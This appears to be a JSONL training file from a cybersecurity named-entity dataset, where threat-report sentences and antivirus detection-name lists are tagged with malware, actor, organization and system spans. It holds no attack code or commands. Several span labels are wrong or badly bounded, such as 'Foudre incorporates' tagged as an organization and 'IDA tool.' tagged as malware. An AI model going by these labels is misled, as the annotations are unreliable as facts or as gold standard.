{"text": "This particular SLocker variant is notable for being one of the first Android file-encrypting ransomware, and the first mobile ransomware to capitalize on the success of the previous WannaCry outbreak.", "spans": {"MALWARE: SLocker variant": [[16, 31]], "MALWARE: Android file-encrypting ransomware,": [[70, 105]], "MALWARE: mobile ransomware": [[120, 137]], "MALWARE: WannaCry": [[183, 191]]}, "info": {"id": "cyner2_train_005850", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit.SWF.CVE-2016-4117.B Exploit-RTF.docswf.d Trojan.Mdropper Win32/Exploit.CVE-2016-4117.A TROJ_CVE20164117.A Exploit.SWF.CVE-2016-4117.B Exploit.Swf.CVE20164117.ecpjvq Exploit.SWF.CVE-2016-4117.B Exploit.SWF.CVE-2016-4117.B Exploit.SWF.1001 TROJ_CVE20164117.A Exploit-RTF.docswf.d RTF/Trojan.XBFM-4 TrojanDropper:Win32/CVE-2016-4117.A Exploit.SWF.CVE-2016-4117.B Exploit.SWF.CVE-2016-4117.B Trojan-Dropper.Win32.CVE-2016-4117 Malicious_Behavior.SB swf.exp.shellcode.b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005851", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.WoletixC.Trojan Backdoor.Likseput.B3 Win32.Trojan.WisdomEyes.16070401.9500.9998 BKDR_LIKSPUT.SMR Trojan.Win32.A.Downloader.14336.AV Win32.Trojan.Spy.Wnmg Trojan.DownLoad2.44669 BKDR_LIKSPUT.SMR BehavesLike.Win32.Downloader.lm Backdoor:Win32/Likseput.B Win32/Backdoor.b78", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005852", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Androm.Win32.27371 Backdoor.W32.Androm.mAsy Trojan/Spy.Shiz.nct Win32.Trojan.Kryptik.qb Win.Trojan.Shifu-6330434-1 Trojan.DownLoader17.28342 Backdoor.Androm.fj TR/AD.Beaugrit.M.29 Trojan[Backdoor]/Win32.Androm Win32.Trojan-Ransom.TeslaCrypt.N SScope.Malware-Cryptor.Drixed Win32/Spy.Shiz.NCT Backdoor.Androm!fkBWkP4HCvw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005853", "source": "cyner2_train"}}
{"text": "Currently, the trojan spy is still in development and is not spotted in-the-wild yet.", "spans": {}, "info": {"id": "cyner2_train_005854", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Prosti.AG8 BackDoor-DUG.a Trojan.DL.Delphi!PZt9n9YNSJ4 Hacktool.Rootkit W32/Delf.GRUM Win32/SillyDl.RUQ TROJ_DLOAD.SMMO Trojan.Scraze Trojan.Win32.Scar.cbyd Trojan.Win32.Downloader.723460 TrojWare.Win32.TrojanDownloader.Delf.~QEA Trojan.DownLoad.40151 TR/Dldr.Delf.uvk TROJ_DLOAD.SMMO BackDoor-DUG.a Backdoor.Win32.Prosti!IK TrojanDownloader.Delf.rui Backdoor:Win32/Prosti.AG Adware.ScreenBlaze Trojan/Win32.Scar Trojan-Downloader.Win32.Delf.uvk Hacktool.Rootkit Win32/Adware.ScreenBlaze.AA Backdoor.Win32.Prosti.xa Backdoor.Win32.Prosti W32/Delf.SCB!tr Downloader.Delf Trj/Downloader.MDW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005855", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9997 BehavesLike.Win32.Downloader.nt Trojan:Win32/Uniemv.B Trojan/Win32.Cryptolocker.C301960 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005856", "source": "cyner2_train"}}
{"text": "Turla macro maldoc - Embassy of the republic of Kazakhstan Helsinki.", "spans": {"MALWARE: Turla macro maldoc": [[0, 18]], "ORGANIZATION: Embassy of the republic of Kazakhstan Helsinki.": [[21, 68]]}, "info": {"id": "cyner2_train_005857", "source": "cyner2_train"}}
{"text": "In late October, Proofpoint researchers identified and began tracking a financially-motivated threat actor group with access to banking Trojans and other malware, including Dridex, Ursnif, Tinba, and the point-of-sale POS malware AbaddonPOS with its loader, TinyLoader.", "spans": {"ORGANIZATION: Proofpoint researchers": [[17, 39]], "THREAT_ACTOR: threat actor group": [[94, 112]], "MALWARE: banking Trojans": [[128, 143]], "MALWARE: malware,": [[154, 162]], "MALWARE: Dridex, Ursnif, Tinba,": [[173, 195]], "MALWARE: the point-of-sale POS malware AbaddonPOS": [[200, 240]], "MALWARE: loader, TinyLoader.": [[250, 269]]}, "info": {"id": "cyner2_train_005859", "source": "cyner2_train"}}
{"text": "On a regular basis for the past several months, we have observed the inclusion of QRAT in a number of spam campaigns.", "spans": {"MALWARE: QRAT": [[82, 86]], "THREAT_ACTOR: spam campaigns.": [[102, 117]]}, "info": {"id": "cyner2_train_005860", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Banker/W32.BestaFera.3193856 W32/Trojan.UWMZ-4840 Trojan.Win32.Depok.dsfkzn Troj.W32.Depok.akz!c BehavesLike.Win32.Dropper.wh Trojan/Win32.Depok Trojan.Heur.EDDAE3 Backdoor:Win32/Nioriglio.A Trojan.Depok!iA0ZBWd8EAg Trojan.Win32.Depok", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005862", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan-Downloader.Dluca.by Trojan.Downloader.Dluca-29 Trojan-Downloader.Win32.Dluca.by TrojWare.Win32.TrojanDownloader.Dluca.~D3 Dialer.Adultparty Trojan-Downloader.Win32.Dluca.dj!IK TrojanDownloader.Dluca.bg TrojanDownloader:Win32/Dluca.DK Win-Trojan/Dluca.94208 Trojan-Downloader.Win32.Dluca.dj", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005863", "source": "cyner2_train"}}
{"text": "The actors appear to have learned from our previous takedown and sinkholing of their Command and Control C2 infrastructure – Foudre incorporates new anti-takeover techniques in an attempt to avoid their C2 domains being sinkholed as we did in 2016.", "spans": {"THREAT_ACTOR: The actors": [[0, 10]], "SYSTEM: infrastructure": [[108, 122]], "ORGANIZATION: Foudre incorporates": [[125, 144]]}, "info": {"id": "cyner2_train_005864", "source": "cyner2_train"}}
{"text": "On April 20, Proofpoint observed a targeted campaign focused on financial analysts working at top global financial firms operating in Russia and neighboring countries.", "spans": {"ORGANIZATION: Proofpoint": [[13, 23]], "THREAT_ACTOR: targeted campaign": [[35, 52]], "ORGANIZATION: financial analysts": [[64, 82]], "ORGANIZATION: global financial firms": [[98, 120]]}, "info": {"id": "cyner2_train_005865", "source": "cyner2_train"}}
{"text": "The loader injects a DLL component found in its body into explorer.exe.", "spans": {"MALWARE: The loader": [[0, 10]]}, "info": {"id": "cyner2_train_005866", "source": "cyner2_train"}}
{"text": "These key technologies allow RSA analysts to process massive datasets and find forensically interesting artifacts in near real-time and more quickly than using standard incident response processes.", "spans": {}, "info": {"id": "cyner2_train_005867", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Posmemdump.A8 TSPY_RAWPOS.SM Win32.Trojan.WisdomEyes.16070401.9500.9903 Infostealer.Rawpos!g1 TSPY_RAWPOS.SM Win.Trojan.RawPOS-1 Trojan.Win32.POSCardStealer.dqfnqc Trojan.Inject1.54360 TrojanSpy.POSCardStealer.e Trojan:Win32/MemCCDump.A!POS Trojan.POSMemDump Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005869", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike.Win32.Trojan.tc MSIL/Injector.TDS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005870", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32!O Backdoor.Takit W32/Recerv.a.dr Trojan.Heur.E5D728 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Zyxerv Backdoor.Win32.Takit Trojan.Win32.Invader.euuocd Trojan.Win32.Z.Takit.135680 Backdoor.W32.Takit!c Backdoor.Win32.Takit.A BackDoor.TakeIt.1 W32/Recerv.a.dr Backdoor/Takit.a BDS/RedCap.xurnc Trojan/Win32.Invader Backdoor.Win32.Takit Backdoor.Takit Win32/Takit.A Win32.Backdoor.Takit.Wrgr Trojan.Win32.Takit W32/RECERV.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005871", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BehavesLike:Win32.Malware", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005872", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Python/Motovilo.A Win32.Worm.Motovilo.Hvjc Win32.HLLW.Motovilo.2 BehavesLike.Win32.Trojan.tc Python/Motovilo.A!worm Trojan:Win32/Motve.A Trj/CI.A Win32/Trojan.09a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005873", "source": "cyner2_train"}}
{"text": "Whether its Exploit Kits or SPAM messages threat actors are pushing as many different variants of Ransomware as possible.", "spans": {"MALWARE: Exploit Kits": [[12, 24]], "THREAT_ACTOR: threat actors": [[42, 55]], "MALWARE: Ransomware": [[98, 108]]}, "info": {"id": "cyner2_train_005874", "source": "cyner2_train"}}
{"text": "Our new intelligence on BlackEnergy expands previous findings on the first wide-scale coordinated attack against industrial networks.", "spans": {"THREAT_ACTOR: BlackEnergy": [[24, 35]]}, "info": {"id": "cyner2_train_005875", "source": "cyner2_train"}}
{"text": "The country is resource rich, with a variety of natural resources and a steady labor supply.", "spans": {}, "info": {"id": "cyner2_train_005877", "source": "cyner2_train"}}
{"text": "ince mid-2016 we have observed multiple new samples of the Android Adware family Ewind", "spans": {"MALWARE: the Android Adware family Ewind": [[55, 86]]}, "info": {"id": "cyner2_train_005880", "source": "cyner2_train"}}
{"text": "Organizations in 31 countries have been targeted in a new wave of attacks which has been underway since at least October 2016.", "spans": {"ORGANIZATION: Organizations": [[0, 13]]}, "info": {"id": "cyner2_train_005881", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HLLW.Cloner Trojan.Vir.HLL Trojan.Heur.EA0E79 W32/HLLW.Cloner W32.Cloner PE_CLONER.A Virus.Win32.HLLW.Cloner Virus.Win32.HLLW.gcdu W32.HLLW.Cloner!c Win32.HLLW.Cloner Win32.HLLW.Cloner.32768 Virus.Cloner.Win32.1 PE_CLONER.A W32/Cloner.worm.a Virus.Win32.HLLW W32/HLLW.Cloner Virus/Win32.Cloner Virus.Win32.HLLW.Cloner W32/Cloner.worm.a W32/HLLW.SelfCloner Win32/HLLW.Cloner Win32.HLLW.Cloner", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005883", "source": "cyner2_train"}}
{"text": "In this collaboration post with Morphisec Lab and Cisco s Research and Efficacy Team, we are now publishing details of this new document variant that makes use of an LNK embedded OLE object, which extracts a JavaScript bot from a document object, and injects a stealer DLL in memory using PowerShell.", "spans": {"ORGANIZATION: Morphisec Lab": [[32, 45]], "ORGANIZATION: Cisco s Research": [[50, 66]], "ORGANIZATION: Efficacy Team,": [[71, 85]], "MALWARE: variant": [[137, 144]], "MALWARE: JavaScript bot": [[208, 222]], "SYSTEM: PowerShell.": [[289, 300]]}, "info": {"id": "cyner2_train_005884", "source": "cyner2_train"}}
{"text": "Alert from the CNCERT related to a piece of malware that is being used to perform DDoS attacks.", "spans": {"ORGANIZATION: CNCERT": [[15, 21]], "MALWARE: malware": [[44, 51]]}, "info": {"id": "cyner2_train_005885", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Troj.W32.Buzus.kZ4S BKDR_PHDET.SMI Win32.Trojan.WisdomEyes.16070401.9500.9959 BKDR_PHDET.SMI Trojan.Win32.A.Downloader.34304.CO BackDoor.Dax BehavesLike.Win32.FDoSBEnergy.nt W32.Trojan.Trojan-downloader.Ge Backdoor:Win32/Phdet.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005886", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32/Dedler.B Win32.Worm.Dedler.U Worm/W32.Dedler.38400.B Win32.Worm.Dedler.U W32/Dedler.c Win32.Worm.Dedler.U W32.Dedler.Worm Win32/Dedler.E WORM_DEDLER.C Win.Worm.Dedler-12 Win32.Worm.Dedler.U Net-Worm.Win32.Dedler.c Win32.Worm.Dedler.U Trojan.Win32.Dedler.frkx Worm.Win32.S.Net-Dedler.38400 W32.W.Dedler.c!c Win32.Worm-net.Dedler.Ahok Win32.Worm.Dedler.U Worm.Win32.Dedler.E Win32.Worm.Dedler.U Trojan.DownLoader.198 Worm.Dedler.Win32.19 BehavesLike.Win32.Downloader.nc Net-Worm.Win32.Dedler W32/Dedler.B.unp Worm/Dedler.c Worm:Win32/Dedler.B WORM/Dedler.G Worm[Net]/Win32.Dedler Worm:Win32/Dedler.B Net-Worm.Win32.Dedler.c Trojan/Win32.Horst.R28469 Worm.Dedler Backdoor.Dedler.E W32/ICQ.Smvss.A!tr Win32/Worm.352", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005887", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Snojan Trojan.Strictor.D43F0 Win.Trojan.Ag-1 Trojan.Win32.Snojan.kbr Trojan.Win32.DownLoad3.csckao Trojan.Win32.Z.Strictor.268488 Troj.W32.Snojan!c Trojan.DownLoad3.30879 Trojan/Invader.kbu TR/Spy.182784.101 Trojan/Win32.Invader TrojanDropper:Win32/Coopop.B Trojan.Win32.Snojan.kbr Trojan.Snojan Win32.Trojan.Snojan.Llhd Trojan-Banker.Win32.Banker Win32/Trojan.67a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005889", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Multi.Threats.InArchive Worm.Win32.Poswauto W64/Trojan.LELA-7925 WORM/Poswauto.gwore Worm:Win32/Poswauto.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005891", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Malware03 Trojan.Win32.Pakes!O TSPY_SUKWIDON.C Win32.Trojan.WisdomEyes.16070401.9500.9998 Infostealer.Sofacy Win32/Metlar.A TSPY_SUKWIDON.C Win.Trojan.Sofacy-1 Trojan.Win32.Pakes.qcb Trojan.Win32.Pakes.fizzg Win32.Trojan.Pakes.Pdmf Trojan.KillProc.7386 Trojan.Pakes.Win32.11534 BehavesLike.Win32.Mydoom.nc Trojan/Win32.Pakes Win32.Troj.Unknown.c.kcloud PWS:Win32/Sukwidon.A Trojan.TDss.20 Troj.W32.Pakes.qcb!c Trojan.Win32.Pakes.qcb Trojan/Win32.Xema.C81978 Trojan.Qhost Trojan.DR.Tiny!eZN8HfCUlLI Trojan.Win32.Sasfis W32/Malware_fam.NB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005892", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97M.Downloader Win32/Exploit.CVE-2017-8570.A TROJ_CVE20170199.JVU Exploit.Xml.CVE-2017-0199.equmby PPT.S.Exploit.35022 Trojan[Exploit]/Win32.CVE-2017-8570 Trojan.Win32.Exploit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005893", "source": "cyner2_train"}}
{"text": "Ironically the decoy document is a flyer concerning the Cyber Conflict U.S. conference organized by the NATO Cooperative Cyber Defence Centre of Excellence on 7-8 November 2017 at Washington, D.C. Due to the nature of this document, we assume that this campaign targets people with an interest in cyber security.", "spans": {"ORGANIZATION: the Cyber Conflict U.S. conference": [[52, 86]], "ORGANIZATION: the NATO Cooperative Cyber Defence Centre of Excellence on": [[100, 158]], "THREAT_ACTOR: campaign": [[253, 261]], "ORGANIZATION: cyber security.": [[297, 312]]}, "info": {"id": "cyner2_train_005894", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/W32.AutoRun.110592.V Worm.Win32.AutoRun!O Win32.Worm.VB.rp Win.Worm.Autorun-7819 Worm.Win32.AutoRun.hvo Trojan.Win32.AutoRun.ubuid Win32.Worm.Autorun.Aihq Win32.HLLW.Autoruner1.8766 Worm.AutoRun.Win32.41616 BehavesLike.Win32.BadFile.ch Worm.Win32.AutoRun Worm/AutoRun.alsp Worm/Win32.AutoRun Worm:Win32/Krangtor.A Trojan.Heur.VP2.gm0faiC9QKoi Worm.Win32.A.AutoRun.87040.A Worm.AutoRun Win32/AutoRun.VB.AJW Worm.AutoRun!P7D8pPa150U", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005898", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Malachite.A W32.WLKSM.A1 Virus.WLKSM.Win32.1 Win32.Malachite.A Win32.Virus.MoonRover.a W32/Malachite.A Virus.Win32.MoonRover Virus.Win32.WLKSM.a Virus.Win32.Infector.dleseh Virus.Win32.WLKSM.AA BehavesLike.Win32.Virut.cc W32/Malachite.A Win32.Malachite.A Virus.Win32.WLKSM.a Win32.Malachite.A Win32.Malachite.A Win32.Malachite.A Virus.Win32.Wlksm.c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005899", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32/Otlard.A W32/Smalltroj.YCPZ Virus.Win32.Heur.c TROJ_OTLARD.SM Trojan-Dropper.Win32.Otlard!IK BackDoor.Gootkit.4 TROJ_OTLARD.SM Win32/Droplet.NU Backdoor/IEbooot.iz TrojanDropper:Win32/Otlard.A Trojan/Win32.Xema Rootkit.Otlard.aa Trojan-Dropper.Win32.Otlard", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005902", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Win32.Fasong!O Trojan.Reconyc Worm.Fasong.Win32.10 Win32.Trojan-PSW.OLGames.bm W32/Worm.DPJC-5721 Trojan.PWS.QQPass WORM_FASONG.L Win.Trojan.Fasong-9 Trojan.Win32.Fsysna.djfi Trojan.Win32.Legmir.bonls Worm.Win32.A.Fasong.461667 Worm.Win32.Fasong.G Win32.HLLW.Fasong.7 WORM_FASONG.L BehavesLike.Win32.Virut.gh W32/Worm.AVIX Worm/Fasong.a W32.Worm.Fasong BDS/Delf.H Worm/Win32.Fasong Worm:Win32/Ming.A W32.W.Fasong.l6SH Trojan.Win32.Fsysna.djfi Trojan/Win32.HDC.C154421 Worm.Fasong Win32/Fasong.G Worm.Fasong!UQMX8yr/3P8 Worm.Win32.Fasong", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005904", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Joke/W32.BadJoke.561258 Trojan.Aduser.A4 Trojan/AddUser.t TROJ_GRAFTOR_EK2501C5.UVPM Win32.Trojan.AddUser.e TROJ_GRAFTOR_EK2501C5.UVPM Win32.Application.PUPStudio.A Trojan.Win32.Z.Graftor.561258 Worm.Win32.Dropper.RA Trojan.Adduser.216 Tool.BadJoke.Win32.3025 Trojan/Pasta.hsb TR/Winlock.KB Trojan.Graftor.D1E8A6 Trojan:Win32/Adduser.D Spyware.OnlineGames Win32/AddUser.T Win32.Trojan-psw.Badjoke.Taer Trojan.AddUser!BXWljasYS+k", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005906", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Blocker TROJ_PUWIN.A Win32.Trojan.WisdomEyes.16070401.9500.9979 TROJ_PUWIN.A Trojan-Ransom.Win32.Blocker.kgxt Trojan.Win32.Keylogger.evercw Trojan.Win32.Z.Blocker.17408.C Troj.Ransom.W32.Blocker!c Trojan.DownLoader25.58899 W32/Trojan.BMCJ-5014 Trojan.Blocker.hvt Trojan[Ransom]/Win32.Blocker Trojan:MSIL/Puwin.A Trojan-Ransom.Win32.Blocker.kgxt Trojan-Ransom.Blocker Trj/GdSda.A Win32.Trojan.Blocker.Tbsp Trojan.Blocker!xyv3gcnzFBI Trojan-Ransom.Win32.Blocker W32/Blocker.KGXT!tr Win32/Trojan.Ransom.460", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005911", "source": "cyner2_train"}}
{"text": "A backdoor also known as: MemScan:Backdoor.Turkojan.DQ Backdoor.Turkojan Backdoor.Turkojan.Win32.25407 Win32.Backdoor.Cakl.c Backdoor.Trojan Win32/Turkojan.A HT_TURKOJAN_HA110001.UVPM Win.Trojan.Truko-10 Backdoor.Win32.Turkojan.zwh MemScan:Backdoor.Turkojan.DQ Trojan.Win32.Turkojan.jebp Win32.Backdoor.Turkojan.Wnwd MemScan:Backdoor.Turkojan.DQ Win32.HLLW.MyBot HT_TURKOJAN_HA110001.UVPM BackDoor-CZP.dr Trojan.Win32.Cakl Backdoor/Turkojan.x BDS/Turkojan.im Trojan[Backdoor]/Win32.Turkojan Backdoor:Win32/Turkojan.AI Backdoor.Turkojan.DQ Troj.W32.Buzus.l4J9 MemScan:Backdoor.Turkojan.DQ Backdoor/Win32.Turkojan.R148548 MemScan:Backdoor.Turkojan.DQ Trojan.SDP.27105 Win32/Cakl.NAG Backdoor.Turkojan.I Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005915", "source": "cyner2_train"}}
{"text": "These unknown actors continued launching DDoS attacks over the next few years.", "spans": {"THREAT_ACTOR: unknown actors": [[6, 20]]}, "info": {"id": "cyner2_train_005916", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Brambul Troj.W32.Brambul.toT6 Win32/Pepex.F Trojan.Win32.Brambul.bp Worm.Win32.Pepex.E0 Win32.HLLW.Bumble BehavesLike.Win32.Downloader.mz Trojan:Win32/Brambul.A Trojan:Win32/Brambul.A!dha Trojan.Win32.Brambul.bp Win32/Tnega.WW Win32.Trojan.Brambul.Dvzk", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005917", "source": "cyner2_train"}}
{"text": "First reports could be linked to Operation Aurora and dated back to 2009 2.", "spans": {"THREAT_ACTOR: Operation Aurora": [[33, 49]]}, "info": {"id": "cyner2_train_005918", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Sefnit.ab Trojan/Jorik.Gbot.cdb Trojan.Sefnit.2 TROJ_DLDR.SMII Win32.Trojan.WisdomEyes.16070401.9500.9938 Trojan.ADH.2 TROJ_DLDR.SMII Win.Trojan.Gbot-539 Trojan.Win32.Jorik.wkvaa Trojan.DownLoader4.46549 Trojan.Jorik.Win32.14116 BehavesLike.Win32.MultiPlug.tz Trojan/Win32.Gbot TrojanDownloader:Win32/Tegtomp.A Trojan/Win32.ADH.C90187 Trojan.Gbot Bck/Qbot.AO Trojan.DL.Tegtomp!ykAGemfy9WA W32/Buzus.AABB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005919", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.3DA4 Trojan/W32.Sasfis.432279 Trojan.Sasfis.Win32.35026 Win32.Trojan.Injector.jm Trojan.Win32.StartPage.ecbeu Trojan.Win32.A.Sasfis.432083 Troj.W32.Invader.liPS Trojan.StartPage.40117 BehavesLike.Win32.Sdbot.gc Trojan/Win32.Sasfis Trojan:Win32/Kilonepag.A Win32.Trojan.Killav.Losk Trojan.Sasfis!92bCxe6lda4 Win32/Trojan.48c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005920", "source": "cyner2_train"}}
{"text": "Zscaler ThreatLabZ has been closely monitoring a new Spy Banker Trojan campaign that has been targeting Portuguese-speaking users in Brazil.", "spans": {"ORGANIZATION: Zscaler ThreatLabZ": [[0, 18]], "MALWARE: Spy Banker Trojan": [[53, 70]], "THREAT_ACTOR: campaign": [[71, 79]], "ORGANIZATION: Portuguese-speaking": [[104, 123]]}, "info": {"id": "cyner2_train_005922", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9989 Trojan.Win32.Kryptik.exgddi Trojange.N TR/Dropper.MSIL.hlkdw Trj/GdSda.A Msil.Trojan.Kryptik.Eyg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005923", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGameAZPIXS.Trojan Trojan-Dropper.Win32.Dapato!O Dropper.Dapato.Win32.12031 Trojan.Delf.106 Trojan.Coinbitminer Win32/CoinMiner.AJ Trojan.Win32.Dapato.vksez Troj.Dropper.W32.Dapato.boht!c Trojan.Packed.194 TR/Kryptik.GZC Trojan[Dropper]/Win32.Dapato Trojan:Win32/Kexqoud.A TrojanDropper.Dapato Trojan.Injector!8vu2hFasaTU Trojan-Dropper.Win32.Dapato W32/Injector.URR!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005925", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.151026.9950.9999 Trojan-Downloader.Win32.Gootkit.kn Trojan.Packed Trojan.Kryptik.Win32.910183 BehavesLike.Win32.BadFile.cm W32/Trojan.TLOU-5726 TR/Renaz.ivfk W32/Gootkit.KN!tr.dldr Trojan/Win32.Inject Trojan.Win32.Crypt Crypt5.BVAN Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005926", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.ServerAJ.Trojan Trojan.Bublik.28294 Trojan.Zusy.Elzob.D833 TSPY_SASFIS_CD10021A.RDXN Win32.Backdoor.Naprat.d W32/Trojan2.MXXM Win32/Spyrat.B TSPY_SASFIS_CD10021A.RDXN Win.Trojan.Hupigon-28437 Trojan.Win32.Bublik.lkn Trojan.Win32.Bot.bblhdq Trojan.Win32.Bublik.lkn TrojWare.Win32.Naprat.A BackDoor.IRC.Bot.355 BehavesLike.Win32.Worm.cc Trojan/Naprat.c Trojan-GameThief.Win32.OnLineGames W32/Trojan.APHW-4252 Trojan/Win32.Sasfis Backdoor:Win32/Naprat.A Trojan.Win32.Bublik.lkn Win-Trojan/Antisb.190976.J Trojan.Bublik Win32/Naprat.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005927", "source": "cyner2_train"}}
{"text": "Today, we have discovered more pieces of the puzzle: two more Corebot samples and an online crypt service.", "spans": {"MALWARE: Corebot": [[62, 69]]}, "info": {"id": "cyner2_train_005928", "source": "cyner2_train"}}
{"text": "The modules analyzed by CTU researchers list recently accessed documents, enumerate installed programs, list recently visited websites, steal passwords, and steal installation files for the IDA tool.", "spans": {"ORGANIZATION: CTU researchers": [[24, 39]], "MALWARE: IDA tool.": [[190, 199]]}, "info": {"id": "cyner2_train_005929", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Virus.Win32.Sality!O Ransom_Natasa.R039C0DLB17 W32/Trojan.IPMQ-6780 Ransom_Natasa.R039C0DLB17 Trojan-Ransom.Satan Ransom:Win32/Natasa.A Trojan-Ransom.Win32.Satan.x Trj/CI.A W32/MBRlock.AP!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005931", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-GameThief.Win32.OnLineGames!O Trojan.Onlinegames Troj.Gamethief.W32.Onlinegames!c Trojan-GameThief.Win32.OnLineGames.bnfw Trojan.Win32.OnLineGames.bwrpuv TrojWare.Win32.GameThief.OnLineGames.~bnfw Trojan.PWS.Qqpass.4325 Trojan-Dropper.Win32.Nemqe Trojan/Vilsel.dki Trojan[GameThief]/Win32.OnLineGames Trojan.Heur.ED351E Trojan-GameThief.Win32.OnLineGames.bnfw TrojanPSW.OnLineGames.a Win32.Trojan-gamethief.Onlinegames.Pfje Win32/Trojan.GameThief.844", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005932", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Cosmu.41472.E Backdoor.Begman.A Trojan/Cosmu.anpk Trojan.Autorun.3 Win32.Trojan.Delf.v W32.Begmian BKDR_BEGMA.SM Trojan.Cosmu.Win32.6467 BKDR_BEGMA.SM BehavesLike.Win32.Sality.pc BDS/Begman.cmnra Worm/Win32.AutoRun Backdoor:Win32/Begman.B Trojan/Win32.Cosmu.R11227 Trj/GdSda.A Trojan.Win32.Autorun.bwq Backdoor.Win32.Begman W32/Begma.SM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005933", "source": "cyner2_train"}}
{"text": "The campaign, which experts believe is still in its early stages, targets Android OS devices.", "spans": {"THREAT_ACTOR: The campaign,": [[0, 13]], "SYSTEM: Android OS devices.": [[74, 93]]}, "info": {"id": "cyner2_train_005934", "source": "cyner2_train"}}
{"text": "In addition, Sundown doesn't have the anti-crawling feature used by other exploit kits.", "spans": {"MALWARE: Sundown": [[13, 20]], "MALWARE: exploit kits.": [[74, 87]]}, "info": {"id": "cyner2_train_005935", "source": "cyner2_train"}}
{"text": "It uses a multi-stage installation process with specific checks at each point to identify if it is undergoing analysis by a security researcher.", "spans": {"ORGANIZATION: security researcher.": [[124, 144]]}, "info": {"id": "cyner2_train_005936", "source": "cyner2_train"}}
